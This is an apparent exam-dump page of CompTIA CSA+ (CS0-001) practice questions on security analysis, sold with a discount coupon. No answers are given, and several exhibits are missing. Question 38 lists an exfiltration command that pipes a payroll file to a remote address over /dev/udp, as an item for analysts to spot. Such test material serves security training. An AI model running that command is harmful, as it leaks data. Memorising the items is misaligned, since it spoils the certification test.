Labour Day Special Limited Time 65% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: cramtreat

Note! Following CS0-001 Exam is Retired now. Please select the alternative replacement for your Exam Certification. The new exam code is CS0-002

CS0-001 CompTIA CSA+ Certification Exam Questions and Answers

Questions 4

The new Chief Technology Officer (CTO) is seeking recommendations for network monitoring services for the local intranet. The CTO would like the capability to monitor all traffic to and from the gateway, as well as the capability to block certain content. Which of the following recommendations would meet the needs of the organization?

Options:

A.

Recommend setup of IP filtering on both the internal and external interfaces of the gateway router.

B.

Recommend installation of an IDS on the internal interface and a firewall on the external interface of the gateway router.

C.

Recommend installation of a firewall on the internal interface and a NIDS on the external interface of the gateway router.

D.

Recommend installation of an IPS on both the internal and external interfaces of the gateway router.

Buy Now
Questions 5

Law enforcement has contacted a corporation’s legal counsel because correlated data from a breach shows the organization as the common denominator from all indicators of compromise. An employee overhears the conversation between legal counsel and law enforcement, and then posts a comment about it on social media. The media then starts contacting other employees about the breach. Which of the following steps should be taken to prevent further disclosure of information about the breach?

Options:

A.

Perform security awareness training about incident communication.

B.

Request all employees verbally commit to an NDA about the breach.

C.

Temporarily disable employee access to social media.

D.

Have law enforcement meet with employees.

Buy Now
Questions 6

A cybersecurity analyst has received the laptop of a user who recently left the company. The analyst types ‘history’ into the prompt, and sees this line of code in the latest bash history:

This concerns the analyst because this subnet should not be known to users within the company. Which of the following describes what this code has done on the network?

Options:

A.

Performed a ping sweep of the Class C network.

B.

Performed a half open SYB scan on the network.

C.

Sent 255 ping packets to each host on the network.

D.

Sequentially sent an ICMP echo reply to the Class C network.

Buy Now
Questions 7

An analyst has initiated an assessment of an organization’s security posture. As a part of this review, the analyst would like to determine how much information about the organization is exposed externally. Which of the following techniques would BEST help the analyst accomplish this goal? (Select two.)

Options:

A.

Fingerprinting

B.

DNS query log reviews

C.

Banner grabbing

D.

Internet searches

E.

Intranet portal reviews

F.

Sourcing social network sites

G.

Technical control audits

Buy Now
Questions 8

After scanning the main company’s website with the OWASP ZAP tool, a cybersecurity analyst is reviewing the following warning:

The analyst reviews a snippet of the offending code:

Which of the following is the BEST course of action based on the above warning and code snippet?

Options:

A.

The analyst should implement a scanner exception for the false positive.

B.

The system administrator should disable SSL and implement TLS.

C.

The developer should review the code and implement a code fix.

D.

The organization should update the browser GPO to resolve the issue.

Buy Now
Questions 9

Which of the following remediation strategies are MOST effective in reducing the risk of a network-based compromise of embedded ICS? (Select two.)

Options:

A.

Patching

B.

NIDS

C.

Segmentation

D.

Disabling unused services

E.

Firewalling

Buy Now
Questions 10

The Chief Executive Officer (CEO) instructed the new Chief Information Security Officer (CISO) to provide a list of enhancement to the company’s cybersecurity operation. As a result, the CISO has identified the need to align security operations with industry best practices. Which of the following industry references is appropriate to accomplish this?

Options:

A.

OSSIM

B.

NIST

C.

PCI

D.

OWASP

Buy Now
Questions 11

The primary difference in concern between remediating identified vulnerabilities found in general-purpose IT network servers and that of SCADA systems is that:

Options:

A.

change and configuration management processes do not address SCADA systems.

B.

doing so has a greater chance of causing operational impact in SCADA systems.

C.

SCADA systems cannot be rebooted to have changes to take effect.

D.

patch installation on SCADA systems cannot be verified.

Buy Now
Questions 12

A software patch has been released to remove vulnerabilities from company’s software. A security analyst has been tasked with testing the software to ensure the vulnerabilities have been remediated and the application is still functioning properly. Which of the following tests should be performed NEXT?

Options:

A.

Fuzzing

B.

User acceptance testing

C.

Regression testing

D.

Penetration testing

Buy Now
Questions 13

Following a recent security breach, a post-mortem was done to analyze the driving factors behind the breach. The cybersecurity analysis discussed potential impacts, mitigations, and remediations based on current events and emerging threat vectors tailored to specific stakeholders. Which of the following is this considered to be?

Options:

A.

Threat intelligence

B.

Threat information

C.

Threat data

D.

Advanced persistent threats

Buy Now
Questions 14

An analyst has noticed unusual activities in the SIEM to a .cn domain name. Which of the following should the analyst use to identify the content of the traffic?

Options:

A.

Log review

B.

Service discovery

C.

Packet capture

D.

DNS harvesting

Buy Now
Questions 15

Which of the following has the GREATEST impact to the data retention policies of an organization?

Options:

A.

The CIA classification matrix assigned to each piece of data

B.

The level of sensitivity of the data established by the data owner

C.

The regulatory requirements concerning the data set

D.

The technical constraints of the technology used to store the data

Buy Now
Questions 16

A small company Is publishing a new web application to receive customer feedback related to Its products. The web server will only host a form to receive the customer feedback and store It In a local database. The web server is placed In a DMZ network, and the web service and filesystem have been hardened. However, the cybersecurity analyst discovers data from the database can be mined from over the Internet. Which of the following should the cybersecurity analyst recommend be done to provide temporary mitigation from unauthorized access to the database?

Options:

A.

Configure the database to listen for Incoming connections on the Internal network.

B.

Change the database connection string and apply necessary patches.

C.

Configure an ACL in the border firewall to block all connections to the web server for ports different than 80 and 443.

D.

Deploy a web application firewall to protect the web application from attacks to the database.

Buy Now
Questions 17

Due to new regulations, a company has decided to institute an organizational vulnerability management program and assign the function to the security team. Which of the following frameworks would BEST support the program? (Select two.)

Options:

A.

COBIT

B.

NIST

C.

ISO 27000 series

D.

ITIL

E.

OWASP

Buy Now
Questions 18

Various devices are connecting and authenticating to a single evil twin within the network. Which of the following are MOST likely being targeted?

Options:

A.

Mobile devices

B.

All endpoints

C.

VPNs

D.

Network infrastructure

E.

Wired SCADA devices

Buy Now
Questions 19

When reviewing network traffic, a security analyst detects suspicious activity:

Based on the log above, which of the following vulnerability attacks is occurring?

Options:

A.

ShellShock

B.

DROWN

C.

Zeus

D.

Heartbleed

E.

POODLE

Buy Now
Questions 20

A cybersecurity analyst is reviewing log data and sees the output below:

Which of the following technologies MOST likely generated this log?

Options:

A.

Stateful inspection firewall

B.

Network-based intrusion detection system

C.

Web application firewall

D.

Host-based intrusion detection system

Buy Now
Questions 21

A cybersecurity analyst is hired to review the security posture of a company. The cybersecurity analyst notices a very high network bandwidth consumption due to SYN floods from a small number of IP addresses.

Which of the following would be the BEST action to take to support incident response?

Options:

A.

Increase the company’s bandwidth.

B.

Apply ingress filters at the routers.

C.

Install a packet capturing tool.

D.

Block all SYN packets.

Buy Now
Questions 22

An organization is attempting to harden its web servers and reduce the information that might be disclosed by potential attackers. A security analyst is reviewing vulnerability scan results from a recent web server scan.

Portions of the scan results are shown below:

Which of the following lines indicates information disclosure about the host that needs to be remediated?

Options:

A.

Response: С:\Documents\MarySmith\mailingList.pdf

B.

Finding#5144322

C.

First Time Detected 10 Nov 2015 09:00 GMT-0600

D.

Access Path: http://myOrg.com/mailingList.htm

E.

Request: GET http://myOrg.com/mailingList.aspx?content=volunteer

Buy Now
Questions 23

A technician receives the following security alert from the firewall’s automated system:

After reviewing the alert, which of the following is the BEST analysis?

Options:

A.

This alert is a false positive because DNS is a normal network function.

B.

This alert indicates a user was attempting to bypass security measures using dynamic DNS.

C.

This alert was generated by the SIEM because the user attempted too many invalid login attempts.

D.

This alert indicates an endpoint may be infected and is potentially contacting a suspect host.

Buy Now
Questions 24

A security analyst performs various types of vulnerability scans.

Review the vulnerability scan results to determine the type of scan that was executed and if a false positive occurred for each device.

Instructions:

Select the Results Generated drop-down option to determine if the results were generated from a credentialed scan, non-credentialed scan, or a compliance scan.

For ONLY the credentialed and non-credentialed scans, evaluate the results for false positives and check the findings that display false positives. NOTE: If you would like to uncheck an option that is currently selected, click on the option a second time.

Lastly, based on the vulnerability scan results, identify the type of Server by dragging the Server to the results.

The Linux Web Server, File-Print Server and Directory Server are draggable.

If at any time you would like to bring back the initial state of the simulation, please select the Reset button. When you have completed the simulation, please select the Done button to submit. Once the simulation is submitted, please select the Next button to continue.

Options:

Buy Now
Questions 25

During which of the following NIST risk management framework steps would an information system security engineer identify inherited security controls and tailor those controls to the system?

Options:

A.

Categorize

B.

Select

C.

Implement

D.

Access

Buy Now
Questions 26

A security analyst wants to scan the network for active hosts. Which of the following host characteristics help to differentiate between a virtual and physical host?

Options:

A.

Reserved MACs

B.

Host IPs

C.

DNS routing tables

D.

Gateway settings

Buy Now
Questions 27

A systems administrator is trying to secure a critical system. The administrator has placed the system behind a firewall, enabled strong authentication, and required all administrators of this system to attend mandatory training.

Which of the following BEST describes the control being implemented?

Options:

A.

Audit remediation

B.

Defense in depth

C.

Access control

D.

Multifactor authentication

Buy Now
Questions 28

A pharmacy gives its clients online access to their records and the ability to review bills and make payments. A new SSL vulnerability on a special platform was discovered, allowing an attacker to capture the data between the end user and the web server providing these services. After investigating the platform vulnerability, it was determined that the web services provided are being impacted by this new threat.

Which of the following data types are MOST likely at risk of exposure based on this new threat? (Choose two.)

Options:

A.

Cardholder data

B.

Intellectual property

C.

Personal health information

D.

Employee records

E.

Corporate financial data

Buy Now
Questions 29

A company invested ten percent of its entire annual budget in security technologies. The Chief Information Officer (CIO) is convinced that, without this investment, the company will risk being the next victim of the same cyber attack its competitor experienced three months ago. However, despite this investment, users are sharing their usernames and passwords with their coworkers to get their jobs done. Which of the following will eliminate the risk introduced by this practice?

Options:

A.

Invest in and implement a solution to ensure non-repudiation

B.

Force a daily password change

C.

Send an email asking users not to share their credentials

D.

Run a report on all users sharing their credentials and alert their managers of further actions

Buy Now
Questions 30

A nuclear facility manager determined the need to monitor utilization of water within the facility. A startup company just announced a state-of-the-art solution to address the need for integrating the business and ICS network. The solution requires a very small agent to be installed on the ICS equipment. Which of the following is the MOST important security control for the manager to invest in to protect the facility?

Options:

A.

Run a penetration test on the installed agent.

B.

Require that the solution provider make the agent source code available for analysis.

C.

Require through guides for administrator and users.

D.

Install the agent for a week on a test system and monitor the activities.

Buy Now
Questions 31

A security analyst is running a routine vulnerability scan against a web farm. The farm consists of a single server acting as a load-balancing reverse proxy and offloads cryptographic processes to the backend servers. The backend servers consist of four servers that process the inquiries for the front end.

A web service SSL query of each server responds with the same output:

Connected (0x000003)

depth=0 /0=farm.company.com/CN=farm.company.com/OU=Domain Control Validated

Which of the following results BEST addresses these findings?

Options:

A.

Advise the application development team that the SSL certificates on the backend servers should be revoked and reissued to match their hostnames

B.

Notify the application development team of the findings and advise management of the results

C.

Create an exception in the vulnerability scanner, as the results and false positives and can be ignored safely

D.

Require that the application development team renews the farm certificate and includes a wildcard for the ‘local’ domain in the certificate SAN field

Buy Now
Questions 32

There have been several exploits to critical devices within the network. However, there is currently no process to perform vulnerability analysis.

Which of the following should the security analyst implement during production hours to identify critical threats and vulnerabilities?

Options:

A.

Asset inventory of all critical devices

B.

Vulnerability scanning frequency that does not interrupt workflow

C.

Daily automated reports of exploited devices

D.

Scanning of all types of data regardless of sensitivity levels

Buy Now
Questions 33

Which of the following is a vulnerability that is specific to hypervisors?

Options:

A.

DDoS

B.

VLAN hopping

C.

Weak encryption

D.

WMescape

Buy Now
Questions 34

Joe, a penetration tester, used a professional directory to identify a network administrator and ID administrator for a client’s company. Joe then emailed the network administrator, identifying himself as the ID administrator, and asked for a current password as part of a security exercise. Which of the following techniques were used in this scenario?

Options:

A.

Enumeration and OS fingerprinting

B.

Email harvesting and host scanning

C.

Social media profiling and phishing

D.

Network and host scanning

Buy Now
Questions 35

A cybersecurity consultant is reviewing the following output from a vulnerability scan against a newly installed MS SQL Server 2012 that is slated to go into production in one week:

Based on the above information, which of the following should the system administrator do? (Select TWO).

Options:

A.

Verify the vulnerability using penetration testing tools or proof-of-concept exploits.

B.

Review the references to determine if the vulnerability can be remotely exploited.

C.

Mark the result as a false positive so it will show in subsequent scans.

D.

Configure a network-based ACL at the perimeter firewall to protect the MS SQL port.

E.

Implement the proposed solution by installing Microsoft patch Q316333.

Buy Now
Questions 36

A security analyst is reviewing a report from the networking department that describes an increase in network utilization, which is causing network performance issues on some systems. A top talkers report over a five-minute sample is included.

Given the above output of the sample, which of the following should the security analyst accomplish FIRST to help track down the performance issues?

Options:

A.

Perform reverse lookups on each of the IP addresses listed to help determine if the traffic is necessary.

B.

Recommend that networking block the unneeded protocols such as Quicktime to clear up some of the congestion.

C.

Put ACLs in place to restrict traffic destined for random or non-default application ports.

D.

Quarantine the top talker on the network and begin to investigate any potential threats caused by the excessive traffic.

Buy Now
Questions 37

A recently issued audit report highlighted exceptions related to end-user handling of sensitive data and access credentials. A security manager is addressing the findings. Which of the following activities should be implemented?

Options:

A.

Update the password policy

B.

Increase training requirements

C.

Deploy a single sign-on platform

D.

Deploy Group Policy Objects

Buy Now
Questions 38

A security analyst is performing a routine check on the SIEM logs related to the commands used by operators and detects several suspicious entries from different users. Which of the following would require immediate attention?

Options:

A.

nmap –A –sV 192.168.1.235

B.

cat payroll.csv > /dev/udp/123.456.123.456/53

C.

cat/etc/passwd

D.

mysql –h 192.168.1.235 –u test -p

Buy Now
Questions 39

Given the following code:

Which of the following types of attacks is occurring in the example above?

Options:

A.

MITM

B.

Session hijacking

C.

XSS

D.

Privilege escalation

E.

SQL injection

Buy Now
Questions 40

During a review of security controls, an analyst was able to connect to an external, unsecured FTP server from a workstation. The analyst was troubleshooting and reviewed the ACLs of the segment firewall the workstation is connected to:

Based on the ACLs above, which of the following explains why the analyst was able to connect to the FTP server?

Options:

A.

FTP was explicitly allowed in Seq 8 of the ACL.

B.

FTP was allowed in Seq 10 of the ACL.

C.

FTP was allowed as being included in Seq 3 and Seq 4 of the ACL.

D.

FTP was allowed as being outbound from Seq 9 of the ACL.

Buy Now
Questions 41

Which of the following command line utilities would an analyst use on an end-user PC to determine the ports it is listening on?

Options:

A.

tracert

B.

ping

C.

nslookup

D.

netstat

Buy Now
Questions 42

A security analyst is assisting in the redesign of a network to make it more secure. The solution should be low cost, and access to the secure segments should be easily monitored, secured, and controlled. Which of the following should be implemented?

Options:

A.

System isolation

B.

Honeyport

C.

Jump box

D.

Mandatory access control

Buy Now
Questions 43

The development team currently consists of three developers who each specialize in a specific programming language:

Developer 1 – C++/C#

Developer 2 – Python

Developer 3 – Assembly

Which of the following SDLC best practices would be challenging to implement with the current available staff?

Options:

A.

Fuzzing

B.

Peer review

C.

Regression testing

D.

Stress testing

Buy Now
Questions 44

NOTE: Question IP must be 192.168.192.123

During a network reconnaissance engagement, a penetration tester was given perimeter firewall ACLs to accelerate the scanning process. The penetration tester has decided to concentrate on trying to brute force log in to destination IP address 192.168.192.132 via secure shell.

Given a source IP address of 10.10.10.30, which of the following ACLs will permit this access?

Options:

A.

B.

C.

D.

Buy Now
Questions 45

A security analyst received an email with the following key:

Xj3XJ3LLc

A second security analyst received an email with following key:

3XJ3xjcLLC

The security manager has informed the two analysts that the email they received is a key that allows access to the company’s financial segment for maintenance. This is an example of:

Options:

A.

dual control

B.

private key encryption

C.

separation of duties

D.

public key encryption

E.

two-factor authentication

Buy Now
Questions 46

A company office was broken into over the weekend. The office manager contacts the IT security group to provide details on which servers were stolen. The security analyst determines one of the stolen servers contained a list of customer PII information, and another server contained a copy of the credit card transactions processed on the Friday before the break-in. In addition to potential security implications of information that could be gleaned from those servers and the rebuilding/restoring of the data on the stolen systems, the analyst needs to determine any communication or notification requirements with respect to the incident. Which of the following items is MOST important when determining what information needs to be provided, who should be contacted, and when the communication needs to occur.

Options:

A.

Total number of records stolen

B.

Government and industry regulations

C.

Impact on the reputation of the company’s name/brand

D.

Monetary value of data stolen

Buy Now
Questions 47

Following the development of a company's new online application, a security analyst Is brought In to test the site's security before going live. The analyst Is given the following URL and credentials:

htt ps://app.com pany.com/Guest User ID: UserBob Password: S#7h&sh*g

After logging In, the URL changes to the following, and the system displays a screen with graphs of various data points:

https;//opp.company.corn/User/dashboard.php?view=grophs

Which of the following Is the BEST choice for a reasonable test of circumventing the site's security?

Options:

A.

Try different combinations of credentials and passwords.

B.

Use the browser's 'View Source" feature to see the underlying HTML.

C.

Browse explicitly to the URL https://app.company.com/Admln.

D.

Alter the URL parameters to dashboard.php?view=charts.

Buy Now
Questions 48

While conducting research on malicious domains, a threat intelligence analyst received a blue screen of death. The analyst rebooted and received a message stating that the computer had been locked and could only be opened by following the instructions on the screen. Which of the following combinations describes the MOST likely threat and the PRIMARY mitigation for the threat?

Options:

A.

Ransomware and update antivirus

B.

Account takeover and data backups

C.

Ransomware and full disk encryption

D.

Ransomware and data backups

Buy Now
Questions 49

Which of the following is the MOST secure method to perform dynamic analysis of malware that can sense when it is in a virtual environment?

Options:

A.

Place the malware on an isolated virtual server disconnected from the network.

B.

Place the malware in a virtual server that is running Windows and is connected to the network.

C.

Place the malware on a virtual server connected to a VLAN.

D.

Place the malware on a virtual server running SIFT and begin analysis.

Buy Now
Questions 50

A corporation employs a number of small-form-factor workstations and mobile devices, and an incident response team is therefore required to build a forensics kit with tools to support chip-off analysis. Which of the following tools would BEST meet this requirement?

Options:

A.

JTAG adapters

B.

Last-level cache readers

C.

Write-blockers

D.

ZIF adapters

Buy Now
Questions 51

A security analyst, who is working for a company that utilizes Linux servers, receives the following results from a vulnerability scan:

Which of the following is MOST likely a false positive?

Options:

A.

ICMP timestamp request remote date disclosure

B.

Windows SMB service enumeration via \srvsvc

C.

Anonymous FTP enabled

D.

Unsupported web server detection

Buy Now
Questions 52

Datacenter access is controlled with proximity badges that record all entries and exits from the datacenter.

The access records are used to identify which staff members accessed the data center in the event of equipment theft.

Which of the following MUST be prevented in order for this policy to be effective?

Options:

A.

Password reuse

B.

Phishing

C.

Social engineering

D.

Tailgating

Buy Now
Questions 53

A cybersecurity analyst has received an alert that well-known “call home” messages are continuously observed by network sensors at the network boundary. The proxy firewall successfully drops the messages. After determining the alert was a true positive, which of the following represents the MOST likely cause?

Options:

A.

Attackers are running reconnaissance on company resources.

B.

An outside command and control system is attempting to reach an infected system.

C.

An insider is trying to exfiltrate information to a remote network.

D.

Malware is running on a company system.

Buy Now
Questions 54

A cybersecurity analyst is reviewing the current BYOD security posture. The users must be able to synchronize their calendars, email, and contacts to a smartphone or other personal device. The recommendation must provide the most flexibility to users. Which of the following recommendations would meet both the mobile data protection efforts and the business requirements described in this scenario?

Options:

A.

Develop a minimum security baseline while restricting the type of data that can be accessed.

B.

Implement a single computer configured with USB access and monitored by sensors.

C.

Deploy a kiosk for synchronizing while using an access list of approved users.

D.

Implement a wireless network configured for mobile device access and monitored by sensors.

Buy Now
Questions 55

Several users have reported that when attempting to save documents in team folders, the following message is received:

The File Cannot Be Copied or Moved – Service Unavailable.

Upon further investigation, it is found that the syslog server is not obtaining log events from the file server to which the users are attempting to copy files. Which of the following is the MOST likely scenario causing these issues?

Options:

A.

The network is saturated, causing network congestion

B.

The file server is experiencing high CPU and memory utilization

C.

Malicious processes are running on the file server

D.

All the available space on the file server is consumed

Buy Now
Questions 56

A system administrator has reviewed the following output:

Which of the following can a system administrator infer from the above output?

Options:

A.

The company email server is running a non-standard port.

B.

The company email server has been compromised.

C.

The company is running a vulnerable SSH server.

D.

The company web server has been compromised.

Buy Now
Questions 57

A system administrator recently deployed and verified the installation of a critical patch issued by the company’s primary OS vendor. This patch was supposed to remedy a vulnerability that would allow an adversary to remotely execute code from over the network. However, the administrator just ran a vulnerability assessment of networked systems, and each of them still reported having the same vulnerability. Which of the following is the MOST likely explanation for this?

Options:

A.

The administrator entered the wrong IP range for the assessment.

B.

The administrator did not wait long enough after applying the patch to run the assessment.

C.

The patch did not remediate the vulnerability.

D.

The vulnerability assessment returned false positives.

Buy Now
Questions 58

An organization wants to remediate vulnerabilities associated with its web servers. An initial vulnerability scan has been performed, and analysts are reviewing the results. Before starting any remediation, the analysts want to remove false positives to avoid spending time on issues that are not actual vulnerabilities. Which of the following would be an indicator of a likely false positive?

Options:

A.

Reports show the scanner compliance plug-in is out-of-date.

B.

Any items labeled ‘low’ are considered informational only.

C.

The scan result version is different from the automated asset inventory.

D.

‘HTTPS’ entries indicate the web page is encrypted securely.

Buy Now
Questions 59

Using a heuristic system to detect an anomaly in a computer’s baseline, a system administrator was able to detect an attack even though the company signature based IDS and antivirus did not detect it. Further analysis revealed that the attacker had downloaded an executable file onto the company PC from the USB port, and executed it to trigger a privilege escalation flaw. Which of the following attacks has MOST likely occurred?

Options:

A.

Cookie stealing

B.

Zero-day

C.

Directory traversal

D.

XML injection

Buy Now
Questions 60

A technician recently fixed a computer with several viruses and spyware programs on it and notices the Internet settings were set to redirect all traffic through an unknown proxy. This type of attack is known as which of the following?

Options:

A.

Phishing

B.

Social engineering

C.

Man-in-the-middle

D.

Shoulder surfing

Buy Now
Questions 61

A security analyst has determined that the user interface on an embedded device is vulnerable to common SQL injections. The device is unable to be replaced, and the software cannot be upgraded. Which of the following should the security analyst recommend to add additional security to this device?

Options:

A.

The security analyst should recommend this device be placed behind a WAF.

B.

The security analyst should recommend an IDS be placed on the network segment.

C.

The security analyst should recommend this device regularly export the web logs to a SIEM system.

D.

The security analyst should recommend this device be included in regular vulnerability scans.

Buy Now
Questions 62

A cybersecurity analyst has received a report that multiple systems are experiencing slowness as a result of a DDoS attack. Which of the following would be the BEST action for the cybersecurity analyst to perform?

Options:

A.

Continue monitoring critical systems.

B.

Shut down all server interfaces.

C.

Inform management of the incident.

D.

Inform users regarding the affected systems.

Buy Now
Questions 63

Which of the following commands would a security analyst use to make a copy of an image for forensics use?

Options:

A.

dd

B.

wget

C.

touch

D.

rm

Buy Now
Questions 64

A cybersecurity analyst is reviewing Apache logs on a web server and finds that some logs are missing. The analyst has identified that the systems administrator accidentally deleted some log files. Which of the following actions or rules should be implemented to prevent this incident from reoccurring?

Options:

A.

Personnel training

B.

Separation of duties

C.

Mandatory vacation

D.

Backup server

Buy Now
Questions 65

An analyst is reviewing a list of vulnerabilities, which were reported from a recent vulnerability scan of a Linux server.

Which of the following is MOST likely to be a false positive?

Options:

A.

OpenSSH/OpenSSL Package Random Number Generator Weakness

B.

Apache HTTP Server Byte Range DoS

C.

GDI+ Remote Code Execution Vulnerability (MS08-052)

D.

HTTP TRACE / TRACK Methods Allowed (002-1208)

E.

SSL Certificate Expiry

Buy Now
Questions 66

An alert is issued from the SIEM that indicates a large number of failed logins for the same account name on one of the application servers starting at 10:20 a.m. No other significant failed login activity is detected. Using Splunk to search for activity pertaining to that account name, a security analyst finds the account has been authenticating successfully for some time and started to fail this morning. The account is attempting to authenticate from an internal server that is running a database to an application server. No other security activity is detected on the network. The analyst discovers the account owner is a developer who no longer works for the company. Which of the following is the MOST likely reason for the failed login attempts for that account?

Options:

A.

The account that is failing to authenticate has not been maintained, and the company password change policy time frame has been reached for that account

B.

The host-based firewall is blocking port 389 LDAP communication, preventing the login credentials from being received by the application server

C.

The license for the application has expired, and the failed logins will continue to occur until a new license key is installed on the application

D.

A successful malware attack has provided someone access to the network, and failed login attempts are an indication of an attempt to privilege access to the application

Buy Now
Questions 67

A security analyst has concluded that a breach occurred and data was exfilterated out of the network. Which of the following roles Is responsible for Identifying the location of the attackers and the stolen data?

Options:

A.

Incident responder

B.

SOC manager

C.

Law enforcement

D.

Incident manager

Buy Now
Questions 68

A medical organization recently started accepting payments over the phone. The manager is concerned about the impact of the storage of different types of data. Which of the following types of data incurs the highest regulatory constraints?

Options:

A.

PHI

B.

PCI

C.

PII

D.

IP

Buy Now
Exam Code: CS0-001
Exam Name: CompTIA CSA+ Certification Exam
Last Update: Apr 14, 2023
Questions: 455